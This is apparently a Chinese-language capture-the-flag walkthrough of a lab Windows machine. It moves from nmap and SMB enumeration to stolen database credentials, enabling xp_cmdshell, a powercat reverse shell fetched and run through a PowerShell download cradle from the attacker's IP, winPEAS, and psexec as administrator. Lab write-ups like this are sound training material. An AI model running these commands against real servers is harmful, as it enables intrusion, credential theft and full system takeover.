一、哪一个TCP端口托管数据库服务器?
1
2
nmap -sV  10.129.186.174
namp -sV -sC 10.129.186.174

image-20230209095638512

二、SMB上可用的非管理共享的名称是什么?
1
2
3
4
5
#使用SMBclient查看共享名称列表
#-N:不使用密码
#-L:列出名称
#-I:IP地址
smbclient -N -L -I 10.129.186.174

image-20230209100546654

三、SMB共享上文件中标识的密码是什么?
1
2
3
4
#-U:指定用户名和密码
smbclient //10.129.186.174/backups -U backups
#下载共享中的文件
get prod.dtsconfig

image-20230209102628923

image-20230209102730804

四、可以使用Impacket集合中的什么脚本来建立与Microsoft SQL Server的经过身份验证的连接?
1
2
3
#经过提示在impacket工具里面,直接在kali工具中寻找
#https://www.kali.org/tools/impacket-scripts/#impacket-mssqlclient
mssqlclient.py

image-20230209140646709

五、可以使用Microsoft SQL Server的哪些扩展存储过程来生成Windows命令shell?
1
xp_cmdshell
六、可以使用什么脚本来搜索可能路径以提升 Windows 主机上的权限?
1
2
3
#WinPEAS.exe 的目标是在 Windows 环境中搜索可能的权限提升路径,需要目标系统(.Net >= 4.5.2)环境,支持打印输出颜色
#https://github.com/carlospolop/PEASS-ng
winpeas
七、什么文件包含管理员的密码?
1
2
#第三题中获取了数据库的用户名和密码,可以用impacket-mssqlclient连接
sudo impacket-mssqlclient [email protected] -windows-auth

image-20230210172312106

1
2
3
4
5
6
7
8
9
#开启xp——cmdshell,使用impactet自带的enable_xp_cmdshell
enable_xp_cmdshell
#使用命令开启
sp_configure 'show advanced options',1
reconfigure
sp_configure 'xp_cmdshell',1
reconfigure
#测试是否开启成功(直接使用xp_cmdshell可能会有问题)
exec master..xp_cmdshell "whoami"

image-20230210172755910

1
2
3
4
5
6
7
8
9
#目标系统为windows server 2008R2,可以尝试制作ps1文件获取shell
#使用powercat或者直接复制网上代码修改IP地址和端口即可
#powercat项目地址
https://github.com/besimorhino/powercat
#管理员打开powershell(注意关闭杀毒软件)
Set-ExecutionPolicy Unrestricted
Import-Module .\powercat.ps1
#生成使用powershell -e可以直接执行的shell
powercat.ps1 -c 10.10.14.28 -p 4444 -ge shell.ps1

image-20230213100244621

1
2
#将shell.ps1文件放到目录中,并在此目录下开启python服务
python3 -m http.server 80

image-20230213100745691

1
2
#使用cmdshell远程下载shell.ps1,并执行
exec master..xp_cmdshell "powershell -exec bypass -c IEX(New-Object System.Net.WebClient).DownloadString('URI');";

image-20230213102017499

image-20230213102031680

1
#获取shell

image-20230213102115639

1
2
3
#使用前面提到过的提权工具winpeas,获取一些文件路径和系统漏洞
curl http://10.10.14.28/winPEASx86.exe -O winPEAS.exe
.\winPEAS.exe

image-20230213144516932

image-20230213144441436

1
2
#找到consolehost_histroy.txt,找到administrator的密码
type consolehost_history.txt

image-20230213144913612

image-20230213144952975

八、提交user的flag
1
2
#切换到C:\users\sql_svc\Desktop
type user.txt

image-20230213145241184

九、提交root的flag
1
2
#使用impacket-psexec连接10.129.11.234
impacket-psexec [email protected]

image-20230213145557664

image-20230213145802945


十、总结
  • impacket工具使用
  • powershell后门的制作
  • winpeas工具的使用
  • consolehost_history.txt文件的作用